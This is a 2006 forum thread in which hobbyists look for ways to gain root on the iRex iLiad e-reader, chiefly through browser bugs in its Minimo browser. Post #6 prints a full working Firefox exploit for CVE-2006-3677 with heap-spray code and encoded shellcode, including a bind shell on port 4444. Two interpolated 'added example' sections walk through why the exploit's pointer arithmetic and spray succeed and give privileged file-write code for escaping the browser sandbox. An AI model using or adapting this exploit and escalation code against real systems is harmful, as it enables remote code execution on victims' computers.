MobileRead Forums > E-Book Readers > More E-Book Readers > iRex > iRex Developer's Corner
Old 07-29-2006, 11:05 AM   #1
TadW
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Status quo

Can you tell me what the current status quo is for gaining root access in firmware 2.5? I know some people tried to brute-force the password, but alas, that could take a *long* time.
Old 07-29-2006, 12:00 PM   #2
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Brute-forcing the password will not be needed, because a netcat can be installed, and even busybox incorporates one.

What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and enabling the Save As... window in any application would also work.

I do not know how to do it. An interesting list of Mozilla bugs is here
http://searchsecurity.techtarget.com...180286,00.html
but I do not know if they apply to the modified Minimo browser we run.

Any other starting points would be appreciated.

Users of 2.4 can try to upgrade to 2.5 while keeping control along a delicate process, which I failed to complete successfully (but which I describe in a separate thread).
Old 07-29-2006, 12:35 PM   #3
TadW
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?
Old 07-29-2006, 01:18 PM   #4
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by TadW
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?
If I could safely assume it is to be soon, I would not be looking into this, as their promise is that any developer will be able to run their own readers. I am not worried if I need to run xdvi as user instead of root. But yes, a motive for the delay is, I guess, that they need to discuss and decide if they need a user separated from root, so a possible consequence of the delay is that the machine will be theoretically more restricted internally.
Old 07-29-2006, 01:39 PM   #5
TadW
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

Quote:
The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution
Old 07-29-2006, 01:43 PM   #6
TadW
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
Here is the full code of the exploit. It seems to require a Java plugin, which I am not sure exists in the case of Minimo.

Code:
<script>

// MoBB Demonstration
function Demo() {

	// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
	// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
	// CVE-2006-3677

	// The Java plugin is required for this to work

	// win32 = calc.exe
	var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
	var fill_win32 = unescape('%u0800');
	var addr_win32 = 0x08000800;
	
	// linux = touch /tmp/METASPLOIT (unreliable)
	var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
	var fill_linux = unescape('%ua8a8');
	var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

	// mac os x ppc = bind a shell to 4444
	var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
	var fill_macppc = unescape('%u0c0c');
	var addr_macppc = 0x0c000000;
	
	// mac os x intel = bind a shell to 4444
	// Thanks to nemo[at]felinemenace.org for shellcode
	// Thanks to Todd Manning for the target information and testing
	var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
	var fill_macx86 = unescape('%u1c1c');
	var addr_macx86 = 0x1c000000;		


	// Start the browser detection
	var shellcode;
	var addr;
	var fill;
	var ua = '' + navigator.userAgent;

	if (ua.indexOf('Linux') != -1) {
		alert('Trying to create /tmp/METASPLOIT');
		shellcode = shellcode_linux;
		addr = addr_linux;
		fill = fill_linux;
	}
	
	if (ua.indexOf('Windows') != -1) {
		alert('Trying to launch Calculator');	
		shellcode = shellcode_win32;
		addr = addr_win32;
		fill = fill_win32;
	}	

	if (ua.indexOf('PPC Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macppc;
		addr = addr_macppc;
		fill = fill_macppc;
	}	
	
	if (ua.indexOf('Intel Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macx86;
		addr = addr_macx86;
		fill = fill_macx86;
	}
			
	if (! shellcode) {
		alert('OS not supported, only attempting a crash!');
		shellcode = unescape('%ucccc');
		fill = unescape('%ucccc');
		addr = 0x02020202;
	}
		
	var b = fill;
	while (b.length <= 0x400000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
			
	
	if (window.navigator.javaEnabled) {
		window.navigator = (addr / 2);
		try {
			java.lang.reflect.Runtime.newInstance(
				java.lang.Class.forName("java.lang.Runtime"), 0
			);
			alert('Patched!');
		}catch(e){
			alert('No Java plugin installed!');
		}
	}
}

</script>
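The `window.navigator = (addr / 2)` line in the demo above is the whole trick, and it is worth seeing the arithmetic behind it. The following is an added example written for this page; it is not code from the posts or from the Metasploit demo. It works out what pointer the engine ends up dereferencing for each of the demo's four targets, why the Linux target has to be written as a negative number, and why each target's `fill` word is chosen so that memory read from the spray points back into the spray. Two things are assumed rather than stated on the page: that the SpiderMonkey engine of that era tagged small integers as `jsval = (i << 1) | 1` with a 31-bit signed range, and that the native code consuming the navigator jsval masked off the low three tag bits before using it as an object pointer. The `addr` and `fill` values are copied from the demo; the 32-unit shellcode length is a stand-in.

```javascript
// Added example (not from the original posts). Assumed SpiderMonkey 1.8 tagged-int
// encoding: jsval = (i << 1) | 1, valid for -2^30 <= i <= 2^30 - 1.
const JSVAL_INT_MIN = -(2 ** 30);
const JSVAL_INT_MAX = 2 ** 30 - 1;

// Raw 32-bit pattern of a tagged-int jsval holding the integer i.
function jsvalIntBits(i) {
  if (!Number.isInteger(i)) throw new RangeError('tagged ints must be integers');
  if (i < JSVAL_INT_MIN || i > JSVAL_INT_MAX) throw new RangeError('outside the 31-bit tagged-int range');
  return ((i << 1) | 1) >>> 0; // >>> 0 gives the unsigned 32-bit view
}

// Pointer the engine uses after `window.navigator = addr / 2`, assuming it strips
// the low three tag bits the way an object jsval is normally unpacked.
// (addr/2) << 1 restores addr, the |1 tag is masked away again, so ptr == addr.
function navigatorObjectPointer(addr) {
  const bits = jsvalIntBits(addr / 2);
  return (bits & ~7) >>> 0;
}

// The demo's `fill` is one UTF-16 unit; two adjacent units form the little-endian
// dword that any pointer-sized read from the sprayed region returns.
function fillDword(fillUnit) {
  return ((fillUnit << 16) | fillUnit) >>> 0;
}

// Spray geometry as the demo builds it: `fill` repeated up to a 1 MiB character
// boundary, then the shellcode; four such units per string, `strings` strings.
function sprayLayout(shellcodeUnits, strings = 36, unitsPerString = 4) {
  const unitChars = 0x100000;
  return {
    shellcodeOffsetChars: unitChars - shellcodeUnits, // payload sits at the end of each unit
    bytesPerString: unitChars * unitsPerString * 2,   // UTF-16: 2 bytes per char
    totalBytes: unitChars * unitsPerString * 2 * strings,
  };
}

// Does a value read back from the fake object land inside the spray that starts at addr?
function fillPointsIntoSpray(addr, fillUnit, sprayBytes) {
  const p = fillDword(fillUnit);
  return p >= addr && p < addr + sprayBytes;
}

// Targets copied from the demo. Linux is written negative because 0xa8000000 / 2
// does not fit a 31-bit tagged int; -0x58000000 / 2 does, and its bit pattern wraps
// to 0xa8000001 (the demo's own "Integer wrap: 0xa8000000" comment).
const TARGETS = {
  win32:  { addr: 0x08000800,  fill: 0x0800 },
  linux:  { addr: -0x58000000, fill: 0xa8a8 },
  macppc: { addr: 0x0c000000,  fill: 0x0c0c },
  macx86: { addr: 0x1c000000,  fill: 0x1c1c },
};

function analyse(name) {
  const t = TARGETS[name];
  const pointer = navigatorObjectPointer(t.addr);
  const sprayBytes = sprayLayout(0x20).totalBytes; // 32-unit shellcode as a stand-in
  return { name, pointer, sprayBytes, selfReferencing: fillPointsIntoSpray(pointer, t.fill, sprayBytes) };
}
```

Running `analyse('win32')` gives pointer `0x08000800` and a self-referencing spray of 288 MiB: the fill dword `0x08000800` equals the fake object's own address, so every field the engine reads from it points back into controlled memory. The same holds for the other three targets, which is why the demo can get away with a flat fill pattern and no information leak.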
Old 07-29-2006, 01:45 PM   #7
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by TadW
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...
It is a Java plugin exploit in theory. But I am going to give it a try.
Old 07-29-2006, 02:42 PM   #8
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
I see some no-crack alternatives:

1) If chrome privileges are enabled or they can be reached, then a New File('/tmp/example') JavaScript call is all we need. See http://docs.mandragor.org/files/Misc...-5-sect-5.html
The problem is that I am not sure how fully the JS libraries are provided in Mozilla Minimo (it is Minimo). But perhaps they can be provided from an external file.

2) To learn how to build a JavaScript navigation toolbar *including a Save As... button*; this button is disabled in Minimo, but it should exist. Perhaps invoking it does not require chrome privileges.
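The privileged file write that option 1) above has in mind, as an added example for this page (not code from the posts, and not anything iRex shipped). It is written against the XPCOM interfaces that Gecko 1.8 browsers exposed to chrome code: nsILocalFile to name the path and nsIFileOutputStream to write it. From an ordinary content page the same call only works if the page can first obtain chrome-level rights (the UniversalXPConnect privilege), which is exactly the access the thread is looking for; in a build where that is blocked the function returns a failure instead of writing. Outside a Gecko runtime (for example under Node.js) `Components` and `netscape` do not exist, and the function reports that rather than throwing. The path and text are constructed inputs; `writeTextFile` and `xpcomAvailable` are names chosen here.

```javascript
// Added example (not from the original posts). Written with `var` and plain
// functions so it would also parse in the JavaScript 1.6-era engine of Minimo.
var PR_WRONLY = 0x02, PR_CREATE_FILE = 0x08, PR_TRUNCATE = 0x20; // NSPR open flags
var MODE_0644 = 420; // 0644 in decimal; octal literals are rejected in strict mode

// Chrome-privileged XPCOM is reachable when Components.classes is visible.
function xpcomAvailable() {
  return typeof Components !== 'undefined' && Components.classes !== undefined;
}

// From a content page, ask for chrome-level rights. Returns true only if the
// browser grants them; a missing `netscape` object or a refusal yields false.
function tryEnableChromePrivilege() {
  try {
    netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
    return true;
  } catch (e) {
    return false;
  }
}

// Create (or truncate) `path` and write `text` to it through XPCOM.
// Returns { ok: true, bytesWritten, path } or { ok: false, reason }.
function writeTextFile(path, text) {
  if (!xpcomAvailable() && !tryEnableChromePrivilege()) {
    return { ok: false, reason: 'no XPCOM access from this context' };
  }
  if (!xpcomAvailable()) {
    return { ok: false, reason: 'privilege requested but Components.classes is still hidden' };
  }
  try {
    var file = Components.classes['@mozilla.org/file/local;1']
      .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(path); // absolute native path, e.g. /tmp/example

    var out = Components.classes['@mozilla.org/network/file-output-stream;1']
      .createInstance(Components.interfaces.nsIFileOutputStream);
    out.init(file, PR_WRONLY | PR_CREATE_FILE | PR_TRUNCATE, MODE_0644, 0);
    // nsIFileOutputStream.write takes a byte string; fine for ASCII content.
    var n = out.write(text, text.length);
    out.close();
    return { ok: true, bytesWritten: n, path: file.path };
  } catch (e) {
    return { ok: false, reason: String(e) };
  }
}
```

Two checks are worth making before trusting any result on a modified browser like the iLiad's: whether `Components.classes` is visible at all from the page (that is the whole question of reaching chrome privileges), and whether the write really landed, since a build that silently redirects or discards file writes, as tribble's Save As... errors suggest, would still return `ok: true` from the stream call.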
Old 07-29-2006, 02:52 PM   #9
tribble
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
I think they messed up the Save As routine, since you cannot save anything anywhere. I always got an error. They might have used a bogus temp file, and so Minimo can't save anything.

/edit: tried to install an xpi, but can't do that either.
Old 07-29-2006, 03:11 PM   #10
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
/edit: tried to install an xpi, but cant do that either.
I got to run the typical UML demo when you press a button and then a javascript application appears.
Old 07-29-2006, 03:22 PM   #11
tribble
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
Quote:
Originally Posted by arivero
I got to run the typical UML demo when you press a button and then a javascript application appears.
But you can't save anything there. The xpi plugins have full access to the filesystem.
Old 07-30-2006, 10:51 AM   #12
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.

/edit: tried to install an xpi, but cant do that either.
The mess is that they use the libs of Minimo but they modified the browser start-up application (called "browser", not "minimo", and installed from a different package).
Old 07-30-2006, 03:18 PM   #13
Gavrahil
Member
Posts: 22
Karma: 10
Join Date: May 2006
Device: Sony Librié
Just as a clarification for the techno-idiot (me)... With 2.4 you could install all kinds of stuff and play with the system, and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!
Old 07-30-2006, 04:05 PM   #14
R2D2
Mad Scientist
Posts: 294
Karma: 242
Join Date: May 2006
Location: Germany
Device: Zaurus, HTCMagician, iLiad
Gavrahil, I would say:

With 2.4 you could try to install all kinds of stuff and try to play with the system.
Old 07-31-2006, 06:11 AM   #15
arivero
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
Quote:
Originally Posted by tribble
But you cant save anything there. The xpi plugins have full acces to the filesystem
It seems that they at iRex have modified the browser beyond Minimo.

I was not expecting to need an xpi plugin; perhaps something simpler, like the old IE
document.execCommand('SaveAs')
which requires user interaction and should not be a privileged command after all.


PS: Mozilla security releases are at
http://www.mozilla.org/projects/secu...abilities.html